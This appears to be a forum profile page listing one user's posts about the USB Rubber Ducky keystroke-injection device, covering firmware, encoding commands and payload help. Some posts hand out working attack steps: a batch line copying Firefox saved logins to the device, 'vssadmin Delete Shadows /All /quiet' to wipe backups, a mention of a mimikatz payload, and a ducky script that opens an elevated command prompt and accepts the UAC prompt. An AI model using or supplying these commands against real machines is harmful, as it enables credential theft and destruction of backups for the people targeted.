Jump to content

shamwow

Active Members
  • Posts

    52
  • Joined

  • Last visited

Recent Profile Visitors

1,080 profile views

shamwow's Achievements

Newbie

Newbie (1/14)

  1. you will have to speak better english than that if you want someone to help you. I don't know what you are asking. what language do you want to change to? use duckencoder to change the language. for usa the command is: java -jar encoder.jar -i script.txt -o inject.bin -l us for canadian: java -jar encoder.jar -i script.txt -o inject.bin -l ca for uk: java -jar encoder.jar -i script.txt -o inject.bin -l uk for german, i think it might be but not sure: java -jar encoder.jar -i script.txt -o inject.bin -l gb
  2. thanks,nowhow do i use it? like how do i put that into the duck? also, do i need to edit the VIDPID.txt? if so then what do i type in VIDPID.txt?
  3. how do i use the VID_PID_SWAPPER in windows and does anyone have a link to the compiled exe file?
  4. use c_duck_v2.1.hex. it's multi os, has mass storage ability and is faster.
  5. try downlaoding the zip file from https://github.com/midnitesnake/usb-rubber-ducky also try puting program.bat and newfirmware.hex in to c:\program files\flip_atmel\bin and then change to that directory in cmd prompt to run program.bat
  6. for /f %%G in ('dir /b /s /a:d "%userprofile%\AppData\Roaming\Mozilla\Firefox\Profiles\*.default"') do xcopy %%G\logins.json %myd%\firefox\ is a batch script command. you need to include the whole line. also, first label your duck drive to the word "ducky" for the payload to work.
  7. why not delete them all and create a new one and use that new one? a batch file can delete them all then run vssown. you can use twin duck firmware as mass storage device too. i use the mimikatz payload to run an exe file that is on the ducky. Here are some options..vssadmin Delete Shadows /For=VolumeSpec [/Oldest] [/Quiet]vssadmin Delete Shadows /Shadow=ShadowID [/Quiet]vssadmin Delete Shadows /All /quiet Example Usage: vssadmin Delete Shadows /For=C: /Oldest /quiet if you still want to delete a specific shadowcopy then use this one vssadmin Delete Shadows /Shadow=ShadowID [/Quiet]
  8. make a batch file and add this: vssadmin Delete Shadows /All /quiet
  9. DEFAULT_DELAY 75 DELAY 3000 CONTROL ESCAPE DELAY 1000 STRING cmd DELAY 1000 CTRL-SHIFT ENTER DELAY 1000 ALT y DELAY 300 ENTER
  10. try c_duck_v2.1.hex and if you are printing hello world then where are you trying to print it? in cmd prompt or in notepad? maybe add one of them to that ducky script.
  11. which version of composite duck is c_duck_v2.1.hex ? is comosite duck-multi the multi os version(c_duck_v2.1.hex)source or the multi payload version of the source? it would be good too if someone could link me directly to the source i need instead of just posting the same link i just posted.
  12. nice idea, i will do it. i will fund 50 euros.
×
×
  • Create New...